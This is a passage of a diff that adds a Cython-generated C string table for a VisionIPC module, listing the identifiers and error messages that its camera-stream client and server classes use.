__pyx_k_Can_only_create_a_buffer_that_is, sizeof(__pyx_k_Can_only_create_a_buffer_that_is), 0, 0, 1, 0}, + {&__pyx_kp_s_Cannot_assign_to_read_only_memor, __pyx_k_Cannot_assign_to_read_only_memor, sizeof(__pyx_k_Cannot_assign_to_read_only_memor), 0, 0, 1, 0}, + {&__pyx_kp_s_Cannot_create_writable_memory_vi, __pyx_k_Cannot_create_writable_memory_vi, sizeof(__pyx_k_Cannot_create_writable_memory_vi), 0, 0, 1, 0}, + {&__pyx_kp_u_Cannot_index_with_type, __pyx_k_Cannot_index_with_type, sizeof(__pyx_k_Cannot_index_with_type), 0, 1, 0, 0}, + {&__pyx_kp_s_Cannot_transpose_memoryview_with, __pyx_k_Cannot_transpose_memoryview_with, sizeof(__pyx_k_Cannot_transpose_memoryview_with), 0, 0, 1, 0}, + {&__pyx_kp_s_Dimension_d_is_not_direct, __pyx_k_Dimension_d_is_not_direct, sizeof(__pyx_k_Dimension_d_is_not_direct), 0, 0, 1, 0}, + {&__pyx_n_s_Ellipsis, __pyx_k_Ellipsis, sizeof(__pyx_k_Ellipsis), 0, 0, 1, 1}, + {&__pyx_kp_s_Empty_shape_tuple_for_cython_arr, __pyx_k_Empty_shape_tuple_for_cython_arr, sizeof(__pyx_k_Empty_shape_tuple_for_cython_arr), 0, 0, 1, 0}, + {&__pyx_n_s_EnumBase, __pyx_k_EnumBase, sizeof(__pyx_k_EnumBase), 0, 0, 1, 1}, + {&__pyx_n_s_EnumType, __pyx_k_EnumType, sizeof(__pyx_k_EnumType), 0, 0, 1, 1}, + {&__pyx_n_s_ImportError, __pyx_k_ImportError, sizeof(__pyx_k_ImportError), 0, 0, 1, 1}, + {&__pyx_kp_s_Incompatible_checksums_0x_x_vs_0, __pyx_k_Incompatible_checksums_0x_x_vs_0, sizeof(__pyx_k_Incompatible_checksums_0x_x_vs_0), 0, 0, 1, 0}, + {&__pyx_kp_s_Incompatible_checksums_0x_x_vs_0_2, __pyx_k_Incompatible_checksums_0x_x_vs_0_2, sizeof(__pyx_k_Incompatible_checksums_0x_x_vs_0_2), 0, 0, 1, 0}, + {&__pyx_n_s_IndexError, __pyx_k_IndexError, sizeof(__pyx_k_IndexError), 0, 0, 1, 1}, + {&__pyx_kp_s_Index_out_of_bounds_axis_d, __pyx_k_Index_out_of_bounds_axis_d, sizeof(__pyx_k_Index_out_of_bounds_axis_d), 0, 0, 1, 0}, + {&__pyx_kp_s_Indirect_dimensions_not_supporte, __pyx_k_Indirect_dimensions_not_supporte, sizeof(__pyx_k_Indirect_dimensions_not_supporte), 0, 0, 1, 0}, + {&__pyx_n_s_IntEnum, __pyx_k_IntEnum, sizeof(__pyx_k_IntEnum), 0, 0, 1, 1}, + {&__pyx_n_s_IntFlag, __pyx_k_IntFlag, sizeof(__pyx_k_IntFlag), 0, 0, 1, 1}, + {&__pyx_kp_u_Invalid_mode_expected_c_or_fortr, __pyx_k_Invalid_mode_expected_c_or_fortr, sizeof(__pyx_k_Invalid_mode_expected_c_or_fortr), 0, 1, 0, 0}, + {&__pyx_kp_u_Invalid_shape_in_axis, __pyx_k_Invalid_shape_in_axis, sizeof(__pyx_k_Invalid_shape_in_axis), 0, 1, 0, 0}, + {&__pyx_n_s_MemoryError, __pyx_k_MemoryError, sizeof(__pyx_k_MemoryError), 0, 0, 1, 1}, + {&__pyx_kp_s_MemoryView_of_r_at_0x_x, __pyx_k_MemoryView_of_r_at_0x_x, sizeof(__pyx_k_MemoryView_of_r_at_0x_x), 0, 0, 1, 0}, + {&__pyx_kp_s_MemoryView_of_r_object, __pyx_k_MemoryView_of_r_object, sizeof(__pyx_k_MemoryView_of_r_object), 0, 0, 1, 0}, + {&__pyx_n_b_O, __pyx_k_O, sizeof(__pyx_k_O), 0, 0, 0, 1}, + {&__pyx_n_s_OrderedDict, __pyx_k_OrderedDict, sizeof(__pyx_k_OrderedDict), 0, 0, 1, 1}, + {&__pyx_kp_u_Out_of_bounds_on_buffer_access_a, __pyx_k_Out_of_bounds_on_buffer_access_a, sizeof(__pyx_k_Out_of_bounds_on_buffer_access_a), 0, 1, 0, 0}, + {&__pyx_n_s_PickleError, __pyx_k_PickleError, sizeof(__pyx_k_PickleError), 0, 0, 1, 1}, + {&__pyx_n_s_Pyx_EnumBase, __pyx_k_Pyx_EnumBase, sizeof(__pyx_k_Pyx_EnumBase), 0, 0, 1, 1}, + {&__pyx_n_s_Pyx_EnumBase___new, __pyx_k_Pyx_EnumBase___new, sizeof(__pyx_k_Pyx_EnumBase___new), 0, 0, 1, 1}, + {&__pyx_n_s_Pyx_EnumBase___repr, __pyx_k_Pyx_EnumBase___repr, sizeof(__pyx_k_Pyx_EnumBase___repr), 0, 0, 1, 1}, + {&__pyx_n_s_Pyx_EnumBase___str, __pyx_k_Pyx_EnumBase___str, sizeof(__pyx_k_Pyx_EnumBase___str), 0, 0, 1, 1}, + {&__pyx_n_s_Pyx_EnumMeta___reduce_cython, __pyx_k_Pyx_EnumMeta___reduce_cython, sizeof(__pyx_k_Pyx_EnumMeta___reduce_cython), 0, 0, 1, 1}, + {&__pyx_n_s_Pyx_EnumMeta___setstate_cython, __pyx_k_Pyx_EnumMeta___setstate_cython, sizeof(__pyx_k_Pyx_EnumMeta___setstate_cython), 0, 0, 1, 1}, + {&__pyx_n_s_Pyx_FlagBase, __pyx_k_Pyx_FlagBase, sizeof(__pyx_k_Pyx_FlagBase), 0, 0, 1, 1}, + {&__pyx_n_s_Pyx_FlagBase___new, __pyx_k_Pyx_FlagBase___new, sizeof(__pyx_k_Pyx_FlagBase___new), 0, 0, 1, 1}, + {&__pyx_n_s_Pyx_FlagBase___repr, __pyx_k_Pyx_FlagBase___repr, sizeof(__pyx_k_Pyx_FlagBase___repr), 0, 0, 1, 1}, + {&__pyx_n_s_Pyx_FlagBase___str, __pyx_k_Pyx_FlagBase___str, sizeof(__pyx_k_Pyx_FlagBase___str), 0, 0, 1, 1}, + {&__pyx_n_s_Sequence, __pyx_k_Sequence, sizeof(__pyx_k_Sequence), 0, 0, 1, 1}, + {&__pyx_kp_s_Step_may_not_be_zero_axis_d, __pyx_k_Step_may_not_be_zero_axis_d, sizeof(__pyx_k_Step_may_not_be_zero_axis_d), 0, 0, 1, 0}, + {&__pyx_kp_b_T, __pyx_k_T, sizeof(__pyx_k_T), 0, 0, 0, 0}, + {&__pyx_n_s_TypeError, __pyx_k_TypeError, sizeof(__pyx_k_TypeError), 0, 0, 1, 1}, + {&__pyx_kp_s_Unable_to_convert_item_to_object, __pyx_k_Unable_to_convert_item_to_object, sizeof(__pyx_k_Unable_to_convert_item_to_object), 0, 0, 1, 0}, + {&__pyx_kp_s_Unknown_enum_value_s, __pyx_k_Unknown_enum_value_s, sizeof(__pyx_k_Unknown_enum_value_s), 0, 0, 1, 0}, + {&__pyx_n_s_VISION_STREAM_DRIVER, __pyx_k_VISION_STREAM_DRIVER, sizeof(__pyx_k_VISION_STREAM_DRIVER), 0, 0, 1, 1}, + {&__pyx_n_s_VISION_STREAM_MAP, __pyx_k_VISION_STREAM_MAP, sizeof(__pyx_k_VISION_STREAM_MAP), 0, 0, 1, 1}, + {&__pyx_n_s_VISION_STREAM_ROAD, __pyx_k_VISION_STREAM_ROAD, sizeof(__pyx_k_VISION_STREAM_ROAD), 0, 0, 1, 1}, + {&__pyx_n_s_VISION_STREAM_WIDE_ROAD, __pyx_k_VISION_STREAM_WIDE_ROAD, sizeof(__pyx_k_VISION_STREAM_WIDE_ROAD), 0, 0, 1, 1}, + {&__pyx_n_s_ValueError, __pyx_k_ValueError, sizeof(__pyx_k_ValueError), 0, 0, 1, 1}, + {&__pyx_n_s_View_MemoryView, __pyx_k_View_MemoryView, sizeof(__pyx_k_View_MemoryView), 0, 0, 1, 1}, + {&__pyx_n_s_VisionBuf, __pyx_k_VisionBuf, sizeof(__pyx_k_VisionBuf), 0, 0, 1, 1}, + {&__pyx_n_s_VisionBuf___reduce_cython, __pyx_k_VisionBuf___reduce_cython, sizeof(__pyx_k_VisionBuf___reduce_cython), 0, 0, 1, 1}, + {&__pyx_n_s_VisionBuf___setstate_cython, __pyx_k_VisionBuf___setstate_cython, sizeof(__pyx_k_VisionBuf___setstate_cython), 0, 0, 1, 1}, + {&__pyx_n_s_VisionIpcClient, __pyx_k_VisionIpcClient, sizeof(__pyx_k_VisionIpcClient), 0, 0, 1, 1}, + {&__pyx_n_s_VisionIpcClient___reduce_cython, __pyx_k_VisionIpcClient___reduce_cython, sizeof(__pyx_k_VisionIpcClient___reduce_cython), 0, 0, 1, 1}, + {&__pyx_n_s_VisionIpcClient___setstate_cytho, __pyx_k_VisionIpcClient___setstate_cytho, sizeof(__pyx_k_VisionIpcClient___setstate_cytho), 0, 0, 1, 1}, + {&__pyx_n_s_VisionIpcClient_available_stream, __pyx_k_VisionIpcClient_available_stream, sizeof(__pyx_k_VisionIpcClient_available_stream), 0, 0, 1, 1}, + {&__pyx_n_s_VisionIpcClient_connect, __pyx_k_VisionIpcClient_connect, sizeof(__pyx_k_VisionIpcClient_connect), 0, 0, 1, 1}, + {&__pyx_n_s_VisionIpcClient_is_connected, __pyx_k_VisionIpcClient_is_connected, sizeof(__pyx_k_VisionIpcClient_is_connected), 0, 0, 1, 1}, + {&__pyx_n_s_VisionIpcClient_recv, __pyx_k_VisionIpcClient_recv, sizeof(__pyx_k_VisionIpcClient_recv), 0, 0, 1, 1}, + {&__pyx_n_s_VisionIpcServer, __pyx_k_VisionIpcServer, sizeof(__pyx_k_VisionIpcServer), 0, 0, 1, 1}, + {&__pyx_n_s_VisionIpcServer___reduce_cython, __pyx_k_VisionIpcServer___reduce_cython, sizeof(__pyx_k_VisionIpcServer___reduce_cython), 0, 0, 1, 1}, + {&__pyx_n_s_VisionIpcServer___setstate_cytho, __pyx_k_VisionIpcServer___setstate_cytho, sizeof(__pyx_k_VisionIpcServer___setstate_cytho), 0, 0, 1, 1}, + {&__pyx_n_s_VisionIpcServer_create_buffers, __pyx_k_VisionIpcServer_create_buffers, sizeof(__pyx_k_VisionIpcServer_create_buffers), 0, 0, 1, 1}, + {&__pyx_n_s_VisionIpcServer_create_buffers_w, __pyx_k_VisionIpcServer_create_buffers_w, sizeof(__pyx_k_VisionIpcServer_create_buffers_w), 0, 0, 1, 1}, + {&__pyx_n_s_VisionIpcServer_send, __pyx_k_VisionIpcServer_send, sizeof(__pyx_k_VisionIpcServer_send), 0, 0, 1, 1}, + {&__pyx_n_s_VisionIpcServer_start_listener, __pyx_k_VisionIpcServer_start_listener, sizeof(__pyx_k_VisionIpcServer_start_listener), 0, 0, 1, 1}, + {&__pyx_n_s_VisionStreamType, __pyx_k_VisionStreamType, sizeof(__pyx_k_VisionStreamType), 0, 0, 1, 1}, + {&__pyx_kp_b__11, __pyx_k__11, sizeof(__pyx_k__11), 0, 0, 0, 0}, + {&__pyx_kp_b__12, __pyx_k__12, sizeof(__pyx_k__12), 0, 0, 0, 0}, + {&__pyx_kp_b__13, __pyx_k__13, sizeof(__pyx_k__13), 0, 0, 0, 0}, + {&__pyx_kp_u__14, __pyx_k__14, sizeof(__pyx_k__14), 0, 1, 0, 0}, + {&__pyx_kp_u__15, __pyx_k__15, sizeof(__pyx_k__15), 0, 1, 0, 0}, + {&__pyx_kp_u__3, __pyx_k__3, sizeof(__pyx_k__3), 0, 1, 0, 0}, + {&__pyx_kp_u__4, __pyx_k__4, sizeof(__pyx_k__4), 0, 1, 0, 0}, + {&__pyx_n_s__5, __pyx_k__5, sizeof(__pyx_k__5), 0, 0, 1, 1}, + {&__pyx_n_s__68, __pyx_k__68, sizeof(__pyx_k__68), 0, 0, 1, 1}, + {&__pyx_kp_u__8, __pyx_k__8, sizeof(__pyx_k__8), 0, 1, 0, 0}, + {&__pyx_kp_u__9, __pyx_k__9, sizeof(__pyx_k__9), 0, 1, 0, 0}, + {&__pyx_n_s_abc, __pyx_k_abc, sizeof(__pyx_k_abc), 0, 0, 1, 1}, + {&__pyx_n_s_allocate_buffer, __pyx_k_allocate_buffer, sizeof(__pyx_k_allocate_buffer), 0, 0, 1, 1}, + {&__pyx_kp_u_and, __pyx_k_and, sizeof(__pyx_k_and), 0, 1, 0, 0}, + {&__pyx_n_s_asarray, __pyx_k_asarray, sizeof(__pyx_k_asarray), 0, 0, 1, 1}, + {&__pyx_n_s_asyncio_coroutines, __pyx_k_asyncio_coroutines, sizeof(__pyx_k_asyncio_coroutines), 0, 0, 1, 1}, + {&__pyx_n_s_available_streams, __pyx_k_available_streams, sizeof(__pyx_k_available_streams), 0, 0, 1, 1}, + {&__pyx_n_s_base, __pyx_k_base, sizeof(__pyx_k_base), 0, 0, 1, 1}, + {&__pyx_n_s_block, __pyx_k_block, sizeof(__pyx_k_block), 0, 0, 1, 1}, + {&__pyx_n_s_blocking, __pyx_k_blocking, sizeof(__pyx_k_blocking), 0, 0, 1, 1}, + {&__pyx_n_s_buf, __pyx_k_buf, sizeof(__pyx_k_buf), 0, 0, 1, 1}, + {&__pyx_n_s_c, __pyx_k_c, sizeof(__pyx_k_c), 0, 0, 1, 1}, + {&__pyx_n_u_c, __pyx_k_c, sizeof(__pyx_k_c), 0, 1, 0, 1}, + {&__pyx_kp_s_cereal_visionipc_visionipc_pyx, __pyx_k_cereal_visionipc_visionipc_pyx, sizeof(__pyx_k_cereal_visionipc_visionipc_pyx), 0, 0, 1, 0}, + {&__pyx_kp_s_cereal_visionipc_visionipc_pyx_p, __pyx_k_cereal_visionipc_visionipc_pyx_p, sizeof(__pyx_k_cereal_visionipc_visionipc_pyx_p), 0, 0, 1, 0}, + {&__pyx_n_s_class, __pyx_k_class, sizeof(__pyx_k_class), 0, 0, 1, 1}, + {&__pyx_n_s_class_getitem, __pyx_k_class_getitem, sizeof(__pyx_k_class_getitem), 0, 0, 1, 1}, + {&__pyx_n_s_cline_in_traceback, __pyx_k_cline_in_traceback, sizeof(__pyx_k_cline_in_traceback), 0, 0, 1, 1}, + {&__pyx_n_s_cls, __pyx_k_cls, sizeof(__pyx_k_cls), 0, 0, 1, 1}, + {&__pyx_n_s_collections, __pyx_k_collections, sizeof(__pyx_k_collections), 0, 0, 1, 1}, + {&__pyx_kp_s_collections_abc, __pyx_k_collections_abc, sizeof(__pyx_k_collections_abc), 0, 0, 1, 0}, + {&__pyx_n_s_conflate, __pyx_k_conflate, sizeof(__pyx_k_conflate), 0, 0, 1, 1}, + {&__pyx_n_s_connect, __pyx_k_connect, sizeof(__pyx_k_connect), 0, 0, 1, 1}, + {&__pyx_kp_s_contiguous_and_direct, __pyx_k_contiguous_and_direct, sizeof(__pyx_k_contiguous_and_direct), 0, 0, 1, 0}, + {&__pyx_kp_s_contiguous_and_indirect, __pyx_k_contiguous_and_indirect, sizeof(__pyx_k_contiguous_and_indirect), 0, 0, 1, 0}, + {&__pyx_n_s_count, __pyx_k_count, sizeof(__pyx_k_count), 0, 0, 1, 1}, + {&__pyx_n_s_create_buffers, __pyx_k_create_buffers, sizeof(__pyx_k_create_buffers), 0, 0, 1, 1}, + {&__pyx_n_s_create_buffers_with_sizes, __pyx_k_create_buffers_with_sizes, sizeof(__pyx_k_create_buffers_with_sizes), 0, 0, 1, 1}, + {&__pyx_n_s_data, __pyx_k_data, sizeof(__pyx_k_data), 0, 0, 1, 1}, + {&__pyx_n_s_dct, __pyx_k_dct, sizeof(__pyx_k_dct), 0, 0, 1, 1}, + {&__pyx_n_s_dict, __pyx_k_dict, sizeof(__pyx_k_dict), 0, 0, 1, 1}, + {&__pyx_n_s_dict_2, __pyx_k_dict_2, sizeof(__pyx_k_dict_2), 0, 0, 1, 1}, + {&__pyx_kp_u_disable, __pyx_k_disable, sizeof(__pyx_k_disable), 0, 1, 0, 0}, + {&__pyx_n_s_doc, __pyx_k_doc, sizeof(__pyx_k_doc), 0, 0, 1, 1}, + {&__pyx_n_s_dtype_is_object, __pyx_k_dtype_is_object, sizeof(__pyx_k_dtype_is_object), 0, 0, 1, 1}, + {&__pyx_kp_u_enable, __pyx_k_enable, sizeof(__pyx_k_enable), 0, 1, 0, 0}, + {&__pyx_n_s_encode, __pyx_k_encode, sizeof(__pyx_k_encode), 0, 0, 1, 1}, + {&__pyx_n_s_enum, __pyx_k_enum, sizeof(__pyx_k_enum), 0, 0, 1, 1}, + {&__pyx_n_s_enumerate, __pyx_k_enumerate, sizeof(__pyx_k_enumerate), 0, 0, 1, 1}, + {&__pyx_n_s_error, __pyx_k_error, sizeof(__pyx_k_error), 0, 0, 1, 1}, + {&__pyx_n_s_extra, __pyx_k_extra, sizeof(__pyx_k_extra), 0, 0, 1, 1}, + {&__pyx_n_s_flags, __pyx_k_flags, sizeof(__pyx_k_flags), 0, 0, 1, 1}, + {&__pyx_n_s_format, __pyx_k_format, sizeof(__pyx_k_format), 0, 0, 1, 1}, + {&__pyx_n_s_fortran, __pyx_k_fortran, sizeof(__pyx_k_fortran), 0, 0, 1, 1}, + {&__pyx_n_u_fortran, __pyx_k_fortran, sizeof(__pyx_k_fortran), 0, 1, 0, 1}, + {&__pyx_n_s_frame_id, __pyx_k_frame_id, sizeof(__pyx_k_frame_id), 0, 0, 1, 1}, + {&__pyx_kp_u_gc, __pyx_k_gc, sizeof(__pyx_k_gc), 0, 1, 0, 0}, + {&__pyx_n_s_get, __pyx_k_get, sizeof(__pyx_k_get), 0, 0, 1, 1}, + {&__pyx_n_s_get_endpoint_name, __pyx_k_get_endpoint_name, sizeof(__pyx_k_get_endpoint_name), 0, 0, 1, 1}, + {&__pyx_n_s_getstate, __pyx_k_getstate, sizeof(__pyx_k_getstate), 0, 0, 1, 1}, + {&__pyx_kp_u_got, __pyx_k_got, sizeof(__pyx_k_got), 0, 1, 0, 0}, + {&__pyx_kp_u_got_differing_extents_in_dimensi, __pyx_k_got_differing_extents_in_dimensi, sizeof(__pyx_k_got_differing_extents_in_dimensi), 0, 1, 0, 0}, + {&__pyx_n_s_height, __pyx_k_height, sizeof(__pyx_k_height), 0, 0, 1, 1}, + {&__pyx_n_s_id, __pyx_k_id, sizeof(__pyx_k_id), 0, 0, 1, 1}, + {&__pyx_n_s_import, __pyx_k_import, sizeof(__pyx_k_import), 0, 0, 1, 1}, + {&__pyx_n_s_index, __pyx_k_index, sizeof(__pyx_k_index), 0, 0, 1, 1}, + {&__pyx_n_s_init, __pyx_k_init, sizeof(__pyx_k_init), 0, 0, 1, 1}, + {&__pyx_n_s_init_subclass, __pyx_k_init_subclass, sizeof(__pyx_k_init_subclass), 0, 0, 1, 1}, + {&__pyx_n_s_initializing, __pyx_k_initializing, sizeof(__pyx_k_initializing), 0, 0, 1, 1}, + {&__pyx_n_s_is_connected, __pyx_k_is_connected, sizeof(__pyx_k_is_connected), 0, 0, 1, 1}, + {&__pyx_n_s_is_coroutine, __pyx_k_is_coroutine, sizeof(__pyx_k_is_coroutine), 0, 0, 1, 1}, + {&__pyx_kp_u_isenabled, __pyx_k_isenabled, sizeof(__pyx_k_isenabled), 0, 1, 0, 0}, + {&__pyx_n_s_itemsize, __pyx_k_itemsize, sizeof(__pyx_k_itemsize), 0, 0, 1, 1}, + {&__pyx_kp_s_itemsize_0_for_cython_array, __pyx_k_itemsize_0_for_cython_array, sizeof(__pyx_k_itemsize_0_for_cython_array), 0, 0, 1, 0}, + {&__pyx_n_s_join, __pyx_k_join, sizeof(__pyx_k_join), 0, 0, 1, 1}, + {&__pyx_n_s_main, __pyx_k_main, sizeof(__pyx_k_main), 0, 0, 1, 1}, + {&__pyx_n_s_member_names, __pyx_k_member_names, sizeof(__pyx_k_member_names), 0, 0, 1, 1}, + {&__pyx_n_s_members, __pyx_k_members, sizeof(__pyx_k_members), 0, 0, 1, 1}, + {&__pyx_n_s_memview, __pyx_k_memview, sizeof(__pyx_k_memview), 0, 0, 1, 1}, + {&__pyx_n_s_metaclass, __pyx_k_metaclass, sizeof(__pyx_k_metaclass), 0, 0, 1, 1}, + {&__pyx_n_s_mode, __pyx_k_mode, sizeof(__pyx_k_mode), 0, 0, 1, 1}, + {&__pyx_n_s_module, __pyx_k_module, sizeof(__pyx_k_module), 0, 0, 1, 1}, + {&__pyx_n_s_module_2, __pyx_k_module_2, sizeof(__pyx_k_module_2), 0, 0, 1, 1}, + {&__pyx_n_s_mro_entries, __pyx_k_mro_entries, sizeof(__pyx_k_mro_entries), 0, 0, 1, 1}, + {&__pyx_n_s_name, __pyx_k_name, sizeof(__pyx_k_name), 0, 0, 1, 1}, + {&__pyx_n_s_name_2, __pyx_k_name_2, sizeof(__pyx_k_name_2), 0, 0, 1, 1}, + {&__pyx_n_s_ndim, __pyx_k_ndim, sizeof(__pyx_k_ndim), 0, 0, 1, 1}, + {&__pyx_n_s_new, __pyx_k_new, sizeof(__pyx_k_new), 0, 0, 1, 1}, + {&__pyx_kp_s_no_default___reduce___due_to_non, __pyx_k_no_default___reduce___due_to_non, sizeof(__pyx_k_no_default___reduce___due_to_non), 0, 0, 1, 0}, + {&__pyx_n_s_np, __pyx_k_np, sizeof(__pyx_k_np), 0, 0, 1, 1}, + {&__pyx_n_s_num_buffers, __pyx_k_num_buffers, sizeof(__pyx_k_num_buffers), 0, 0, 1, 1}, + {&__pyx_n_s_numpy, __pyx_k_numpy, sizeof(__pyx_k_numpy), 0, 0, 1, 1}, + {&__pyx_kp_u_numpy_core_multiarray_failed_to, __pyx_k_numpy_core_multiarray_failed_to, sizeof(__pyx_k_numpy_core_multiarray_failed_to), 0, 1, 0, 0}, + {&__pyx_kp_u_numpy_core_umath_failed_to_impor, __pyx_k_numpy_core_umath_failed_to_impor, sizeof(__pyx_k_numpy_core_umath_failed_to_impor), 0, 1, 0, 0}, + {&__pyx_n_s_obj, __pyx_k_obj, sizeof(__pyx_k_obj), 0, 0, 1, 1}, + {&__pyx_n_s_pack, __pyx_k_pack, sizeof(__pyx_k_pack), 0, 0, 1, 1}, + {&__pyx_n_s_parents, __pyx_k_parents, sizeof(__pyx_k_parents), 0, 0, 1, 1}, + {&__pyx_n_s_pickle, __pyx_k_pickle, sizeof(__pyx_k_pickle), 0, 0, 1, 1}, + {&__pyx_n_s_prepare, __pyx_k_prepare, sizeof(__pyx_k_prepare), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_PickleError, __pyx_k_pyx_PickleError, sizeof(__pyx_k_pyx_PickleError), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_checksum, __pyx_k_pyx_checksum, sizeof(__pyx_k_pyx_checksum), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_result, __pyx_k_pyx_result, sizeof(__pyx_k_pyx_result), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_state, __pyx_k_pyx_state, sizeof(__pyx_k_pyx_state), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_type, __pyx_k_pyx_type, sizeof(__pyx_k_pyx_type), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_unpickle_Enum, __pyx_k_pyx_unpickle_Enum, sizeof(__pyx_k_pyx_unpickle_Enum), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_unpickle___Pyx_EnumMeta, __pyx_k_pyx_unpickle___Pyx_EnumMeta, sizeof(__pyx_k_pyx_unpickle___Pyx_EnumMeta), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_vtable, __pyx_k_pyx_vtable, sizeof(__pyx_k_pyx_vtable), 0, 0, 1, 1}, + {&__pyx_n_s_qualname, __pyx_k_qualname, sizeof(__pyx_k_qualname), 0, 0, 1, 1}, + {&__pyx_n_s_range, __pyx_k_range, sizeof(__pyx_k_range), 0, 0, 1, 1}, + {&__pyx_n_s_recv, __pyx_k_recv, sizeof(__pyx_k_recv), 0, 0, 1, 1}, + {&__pyx_n_s_reduce, __pyx_k_reduce, sizeof(__pyx_k_reduce), 0, 0, 1, 1}, + {&__pyx_n_s_reduce_cython, __pyx_k_reduce_cython, sizeof(__pyx_k_reduce_cython), 0, 0, 1, 1}, + {&__pyx_n_s_reduce_ex, __pyx_k_reduce_ex, sizeof(__pyx_k_reduce_ex), 0, 0, 1, 1}, + {&__pyx_n_s_register, __pyx_k_register, sizeof(__pyx_k_register), 0, 0, 1, 1}, + {&__pyx_n_s_repr, __pyx_k_repr, sizeof(__pyx_k_repr), 0, 0, 1, 1}, + {&__pyx_n_s_res, __pyx_k_res, sizeof(__pyx_k_res), 0, 0, 1, 1}, + {&__pyx_n_s_rgb, __pyx_k_rgb, sizeof(__pyx_k_rgb), 0, 0, 1, 1}, + {&__pyx_kp_s_s_s, __pyx_k_s_s, sizeof(__pyx_k_s_s), 0, 0, 1, 0}, + {&__pyx_kp_s_s_s_d, __pyx_k_s_s_d, sizeof(__pyx_k_s_s_d), 0, 0, 1, 0}, + {&__pyx_n_s_self, __pyx_k_self, sizeof(__pyx_k_self), 0, 0, 1, 1}, + {&__pyx_kp_s_self_buf_cannot_be_converted_to, __pyx_k_self_buf_cannot_be_converted_to, sizeof(__pyx_k_self_buf_cannot_be_converted_to), 0, 0, 1, 0}, + {&__pyx_kp_s_self_server_cannot_be_converted, __pyx_k_self_server_cannot_be_converted, sizeof(__pyx_k_self_server_cannot_be_converted), 0, 0, 1, 0}, + {&__pyx_n_s_send, __pyx_k_send, sizeof(__pyx_k_send), 0, 0, 1, 1}, + {&__pyx_n_s_set_name, __pyx_k_set_name, sizeof(__pyx_k_set_name), 0, 0, 1, 1}, + {&__pyx_n_s_setstate, __pyx_k_setstate, sizeof(__pyx_k_setstate), 0, 0, 1, 1}, + {&__pyx_n_s_setstate_cython, __pyx_k_setstate_cython, sizeof(__pyx_k_setstate_cython), 0, 0, 1, 1}, + {&__pyx_n_s_shape, __pyx_k_shape, sizeof(__pyx_k_shape), 0, 0, 1, 1}, + {&__pyx_n_s_size, __pyx_k_size, sizeof(__pyx_k_size), 0, 0, 1, 1}, + {&__pyx_n_s_spec, __pyx_k_spec, sizeof(__pyx_k_spec), 0, 0, 1, 1}, + {&__pyx_n_s_start, __pyx_k_start, sizeof(__pyx_k_start), 0, 0, 1, 1}, + {&__pyx_n_s_start_listener, __pyx_k_start_listener, sizeof(__pyx_k_start_listener), 0, 0, 1, 1}, + {&__pyx_n_s_state, __pyx_k_state, sizeof(__pyx_k_state), 0, 0, 1, 1}, + {&__pyx_n_s_staticmethod, __pyx_k_staticmethod, sizeof(__pyx_k_staticmethod), 0, 0, 1, 1}, + {&__pyx_n_s_step, __pyx_k_step, sizeof(__pyx_k_step), 0, 0, 1, 1}, + {&__pyx_n_s_stop, __pyx_k_stop, sizeof(__pyx_k_stop), 0, 0, 1, 1}, + {&__pyx_n_s_str, __pyx_k_str, sizeof(__pyx_k_str), 0, 0, 1, 1}, + {&__pyx_n_s_stream, __pyx_k_stream, sizeof(__pyx_k_stream), 0, 0, 1, 1}, + {&__pyx_n_s_stride, __pyx_k_stride, sizeof(__pyx_k_stride), 0, 0, 1, 1}, + {&__pyx_kp_s_strided_and_direct, __pyx_k_strided_and_direct, sizeof(__pyx_k_strided_and_direct), 0, 0, 1, 0}, + {&__pyx_kp_s_strided_and_direct_or_indirect, __pyx_k_strided_and_direct_or_indirect, sizeof(__pyx_k_strided_and_direct_or_indirect), 0, 0, 1, 0}, + {&__pyx_kp_s_strided_and_indirect, __pyx_k_strided_and_indirect, sizeof(__pyx_k_strided_and_indirect), 0, 0, 1, 0}, + {&__pyx_kp_s_stringsource, __pyx_k_stringsource, sizeof(__pyx_k_stringsource), 0, 0, 1, 0}, + {&__pyx_n_s_struct, __pyx_k_struct, sizeof(__pyx_k_struct), 0, 0, 1, 1}, + {&__pyx_n_s_super, __pyx_k_super, sizeof(__pyx_k_super), 0, 0, 1, 1}, + {&__pyx_n_s_sys, __pyx_k_sys, sizeof(__pyx_k_sys), 0, 0, 1, 1}, + {&__pyx_n_s_test, __pyx_k_test, sizeof(__pyx_k_test), 0, 0, 1, 1}, + {&__pyx_n_s_timeout_ms, __pyx_k_timeout_ms, sizeof(__pyx_k_timeout_ms), 0, 0, 1, 1}, + {&__pyx_n_s_timestamp_eof, __pyx_k_timestamp_eof, sizeof(__pyx_k_timestamp_eof), 0, 0, 1, 1}, + {&__pyx_n_s_timestamp_sof, __pyx_k_timestamp_sof, sizeof(__pyx_k_timestamp_sof), 0, 0, 1, 1}, + {&__pyx_n_s_tp, __pyx_k_tp, sizeof(__pyx_k_tp), 0, 0, 1, 1}, + {&__pyx_kp_s_unable_to_allocate_array_data, __pyx_k_unable_to_allocate_array_data, sizeof(__pyx_k_unable_to_allocate_array_data), 0, 0, 1, 0}, + {&__pyx_kp_s_unable_to_allocate_shape_and_str, __pyx_k_unable_to_allocate_shape_and_str, sizeof(__pyx_k_unable_to_allocate_shape_and_str), 0, 0, 1, 0}, + {&__pyx_n_s_unpack, __pyx_k_unpack, sizeof(__pyx_k_unpack), 0, 0, 1, 1}, + {&__pyx_n_s_update, __pyx_k_update, sizeof(__pyx_k_update), 0, 0, 1, 1}, + {&__pyx_n_s_use_setstate, __pyx_k_use_setstate, sizeof(__pyx_k_use_setstate), 0, 0, 1, 1}, + {&__pyx_n_s_uv_offset, __pyx_k_uv_offset, sizeof(__pyx_k_uv_offset), 0, 0, 1, 1}, + {&__pyx_n_s_v, __pyx_k_v, sizeof(__pyx_k_v), 0, 0, 1, 1}, + {&__pyx_n_s_value, __pyx_k_value, sizeof(__pyx_k_value), 0, 0, 1, 1}, + {&__pyx_n_s_values, __pyx_k_values, sizeof(__pyx_k_values), 0, 0, 1, 1}, + {&__pyx_n_s_version_info, __pyx_k_version_info, sizeof(__pyx_k_version_info), 0, 0, 1, 1}, + {&__pyx_n_s_width, __pyx_k_width, sizeof(__pyx_k_width), 0, 0, 1, 1}, + {0, 0, 0, 0, 0, 0, 0} + }; + return __Pyx_InitStrings(__pyx_string_tab); +} 